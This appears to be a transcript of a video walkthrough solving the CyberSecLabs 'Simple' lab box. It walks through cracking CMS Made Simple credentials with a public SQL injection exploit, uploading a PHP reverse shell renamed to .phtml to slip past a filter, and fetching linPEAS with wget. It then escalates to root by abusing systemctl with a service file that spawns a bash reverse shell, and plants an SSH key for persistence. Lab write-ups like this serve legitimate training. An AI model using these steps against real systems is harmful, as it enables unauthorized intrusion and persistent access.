Hello everybody, and today we'll be doing simple from CyberSecLabs. Now this is my second time recording this video because the audio was messed up in the first one and that was just a complete waste of time. So yeah, I'm just gonna redo this video. First we're just gonna ping it to make sure it's up, and it is up. We're just gonna nmap this machine. We'll do .php which scans for all the ports. So yeah, we're just gonna let that run. So yeah, but if we were to look back, I still have that old nmap scan open, but we're just gonna let this one run out. And yeah, so this is a Linux box, but that's okay, and we're done. Alright, so it's SSH, has SSH open, and it also has Apache 2.4.29. might have CMS made simple, so when we check that out, and yes, CMS made simple. So from previous experience, I actually made a video, similar video, where I did CMS made simple. I think it was on Try Hack Me Simple CTF. I think that was my first video on my channel, my second video actually, but so yeah, it's my second video. So why don't we just search up CMS made simple exploits, and I know that there's an exploit out there for it. So why don't we first dirsearch this thing just to see what might be out there. Maybe there's something else hiding. So this dirsearch -u url -e all extensions, and you can see the extensions here, all these -x exclude 400 500 error codes, and it's recursive, and we have recursive threads 100. And already we're starting to see something /admin, so that's interesting. When we oops, nope, not that, /admin, we do see an admin page that I'm still logged into. Okay, let's log out. Yes, this is log out. Alright, I'm sorry, I didn't take a break or reset the box or anything. I just yeah, so this is /admin, and we can try admin. Let me see if that works. No, that does not work. And we can try admin password. Admin password does not work. So we searched up CMS made simple exploits. We see this one SQL injection. We can take a look at this. Looks like there's a Python script, and yes, this is very slow. I can't scroll. Okay, there we go. So yeah, and over here we can see here example usage. We can no cracking password with cracking password, so we do want to crack a password, so we'll do that. Should give us some sort of login, and why don't we just create a new window, cd downloads ls, you can see it's right there. So why don't we move this into my video directory, and we can also cd to video. Alright, and again we can check this out. So example with cracking password, exploit.py url --crack word -w word list. So yeah, why don't we do that? We can just python this, and you can see it's right here. Now it might tell you something like a term color not installed when you run this. Just do pip install term color, and it should work. Should say I already have it. Yeah, you can see I already have it, but if you don't, you can just run that command. Yeah, so why don't we python this exploit -u http:// the IP address, and we can do --crack wordless user share wordless racu.txt. So we'll let that run. We'll come back over here. Let's see, uploads hello, which okay, never mind, I actually put that there. We do see uploads images, so why don't we check that out? So why don't we check out /uploads first to see what's here. You can see nothing's here, so why don't we control U and see what's up. Nothing's here either. Let's try uploads images. Nothing's here either. Alright, so nothing, we don't see anything here. We can try uploads index, but again, I don't think we'll see anything. But we're not really getting any error messages, just nothing here. Yeah. So let's just hope we can grab something from the exploit. Oops, nope. We do see username David, so that's awesome. When you try logging in with David, Oops, nope. Admin. And we can try doing David. Maybe we can try David password. You see nothing works. So we can try David admin maybe. Try David password 123. You can also see we have nothing. But they should crack us a password. You can see he's trying to find some emails. And over here we see going through some more stuff. We also see /temp. So why don't we check out /temp? We don't really see anything here. We see cache. Nothing's in here again. Future page sorts. We don't really have anything. If we come back over here, templates, page source, review page source, we have nothing. So we don't really get anything there. If we come back over here, you can see it does find an email for us, David at simple.csl. Now let's try to crack some passwords for us. So yeah, we don't really have anything else over here. You see /doc, but the most interesting thing is probably just the admin page. It's not with the exploit. Hopefully the exploit can grab us a password, and from there we can try to log in. And we also see that it has SSH, right? So it has SSH, so maybe we can try logging in with with the same credentials, because password reuse is a thing. So if that doesn't work, we can just try to log in and go from there. So let's just see over here. You can see password cracked Punisher. Alright, so we do have a password Punisher. So why don't we come back over here /admin, and we can try David, and we also try Punisher. Okay, and you see we are logged in. So why don't we come back over here? We can try to SSH to it. David at that IP address. And just try Punisher. You see it doesn't work, but it's always a good thing to try it. See if it works or not. You can see it doesn't really work. But that's fine. Let's just come back over here. We can try to see what's up. CMS. Let's just go down the list. Over here, content. You see file manager. That's interesting. Maybe we can upload some sort of files. So why don't we go over here to content? You can see content manager. Not really anything here. File manager, by far the most interesting. So we are in the uploads directory, I think. Come over here. Yeah, you can see we are in uploads. Simple. So we do have access to uploads, as you saw before. So why don't we try to put some sort of I'm just gonna remove these. Delete. I'm just gonna try to put in some sort of make sure we can upload something. So why don't we just put in and again upload something and access it. So why don't we just do echo hello to hi.text, and now we can come back over here. We can just do browse video hi.text. You can see hi.text does show up, and if we click it, we see it's in uploads hi.text. So this is where it's going to show up. We can upload something, we can access it. So it's awesome for us. Why don't we try to maybe upload a PHP Reverse Shell? I'll leave the link in the description if you don't have it, but I'm pretty sure everyone has it by now. So yeah, why don't we just copy /auth, that's where it's in, PHP Reverse Shell over here. And why don't we just nano this IP, we're gonna change that to our IP address. So the port, we can just leave it on 1234. So why don't we upload this now? And you can see nothing shows up. So why doesn't anything show up? We were able to upload the hi.txt, but the PHP Reverse Shell doesn't work. I guess it just doesn't like PHP. There's probably a filter here. That's fine. We can just rename it. We can just rename it to something like PHP. We just call it shell. Shell.phtml. Okay, we can try phtml. If that doesn't work, we can try some other ones. But this works most of the time, and you can see it does work. So it did work. So why don't we start a netcat listener on 1234. Maybe we can try to run that. Oops. And you see we do have a shell. So why don't we come over here to pentest.ws and we can just come over to shells and let's just upgrade our shell. Alright, so we are here. Why don't we go to home David? You can see our access flags over here. I guess someone left linenum. We do ls-la. Okay, that's great. So why don't we go over to dev.shm and see if we can upload some sort of linPEAS or something to do some privilege escalation. We can also try sudo-l first, but we'll probably need a password for that. We can't try Punisher. I don't think that works though. Will it? No, Punisher. No. Okay. So we can go over to /op because that's where I kept it. Linux privilege escalation. I'm not sure. It was giving me trouble earlier. But why don't we try it again? wget http://10. Hold up. Remove linPEAS.sh. And now we can just grab it by doing wget http://10.10.098 on port 80 linPEAS.sh. Hey, and it worked. Alright. So why don't we just close out of this and we can just do shmod +x linPEAS.sh. Make it executable and we execute. And it looks like I already found some LXD. Maybe we can try to abuse that. But let's just let it run out and see what it shows. Ooh, something's lighting up. So you can see some more files. Come on. Ooh, we do see something interesting files. Bin systemctl. So we're just gonna keep letting it run out and we'll look at it from there. Maybe we'll see something more interesting. Alright, it's done. So why don't we head all the way back up? Okay, why don't we head all the way up? Come on. It's a lot of stuff. Alright, we can already see this LXD. Maybe we can prevest with that, but try some other things. Come on, you'll see some sort of file over here. Let's see. Okay, we're just gonna. Okay, possible private SSH key. Bin systemctl. And I don't really know what that is. Maybe we can just copy this. Let's just say we don't know what it is. And you can see there's nothing really much that interesting, except for this. But yeah, why don't we head over to home David. Maybe we can try to just run this and see what it is. Looks like it works with some services over here. Now we can just search up systemctl, right? What's the systemctl command? Is a new tool to control system, and service. Okay, so it just controls some sort of services. We can just do privilege escalation and see what we get is this medium article over here. If we just look at this, we can see. Alright, systemctl misconfigured permissions. Okay. Now you can read through this entire thing, but we can skim through it. The binary systemctl is a process that exists in Linux operating systems that is used to start different services, such as Apache servers. Okay, so if it works, that used to start different services, maybe like we can put in our own service, and then we can just use this to start it, and then within that service we can have it like get a reverse shell out of it. So yeah. Generally reserved for privileged users such as system administrators, but obviously we're able to access it there. So what do we need to do? First, we're going to create a systemd unit file, which is where the systemctl references when starting a service. So it looks like we need to create a service file, and over here you can see, let me just copy this, but it's important to make sure the user value, which I guess is this over here, is set to root. It's set to the user you want systemctl to execute the service as. Obviously we want it to be root, so we're just gonna put root. The exec start parameter is where we need to place our payload in case, yeah, I'm using a one-line bash reverse shell. So I guess that's where we can grab our reverse shell over here. So yeah, why don't we just come over here. We can actually, why don't we do this in our own terminal and we can just grab it, because I don't think we have nano here. Yeah, we don't have nano. So yeah, we can just do nano root.service, and we can do unit description equals privilege service. We do type equals simple user. As he mentioned, you have to put root or whatever user you want to be, exec start, and then we can do bin bash -c. So execute a command. We can just use bash like he did, 10.10.098. We just leave it on port. Actually, we'll just do 6969. Grab this, place it in here, and if we go back over here, and he just puts one last thing, install wanted by equal multi user.target. Alright, so we have that. Why don't we start PyWeb, and we can wget http our IP address, and we can root.service. That works. I'm gonna start up a client listener on that port. And over here, payload execution. Before we can execute our root.service file, we need to place it onto the target file system. If it's not already there, it's already there. Once that's done, we just need to use systemctl to start a custom service. To do this, we first need to set up our listener, which we've done. Once we do that, we need to make sure we specify our root.service file location in our systemctl command arguments. Alright, so I guess we need to specify our root.service file location. So why don't we do systemctl enable home David root.service. Okay. And now to execute it, we just need to do systemctl start and then root. So why don't we do systemctl start root. Does that work? Bin systemctl enable home David root.service. Bin systemctl start root.service. Are we doing something wrong? Maybe we have our script wrong, I'm not sure. Everything should be working. Everything should be working. I'm not sure what it is. Maybe it's my other terminal over here. I'll exit out of this. I'll also exit out of this. And yeah, that should be it. So why don't we try it again? Bin systemctl. That is working. So bin systemctl enable home David root.service. It is here, right? Maybe we need to root.service. So we can just do bin systemctl enable root.service. Bin systemctl start root.service. Okay, there we go. I guess maybe we just need to make it executable or whatever. And we have root. So why don't we head over to root, and that's your system, that text right over there. And do see a .ssh. We do see authorized keys. So why don't we add our key over there? So we can just head over here, cd.ssh ls-la. We can cat or idrc. We can put a public key into the allowed authorized keys, and we can SSH into there. It's a good way to maintain persistent access. So why don't we just echo our, oh shoot, and we just left it. Oh boy. We can't tab up. Then systemctl start root.service. Okay. cd root.ssh. We can echo this into authorized keys. Cat authorized keys. And now maybe we can SSH root at the IP address. Just grab that. That decides to work, and we logged in with SSH without a password. So now we can work from here, but we're done. So I hope you guys enjoyed this video. It's my second time recording it, so I'm sorry if, I don't know, it seemed weird or boring. We also had to do some cleanups in between, but that's fine. So yeah, I hope you guys enjoyed this video. If you did, please leave a thumbs up, and I'm probably gonna make some more soon, maybe on Unroot or a week, probably coming out this weekend. So yeah, until again, I'll see you guys next time.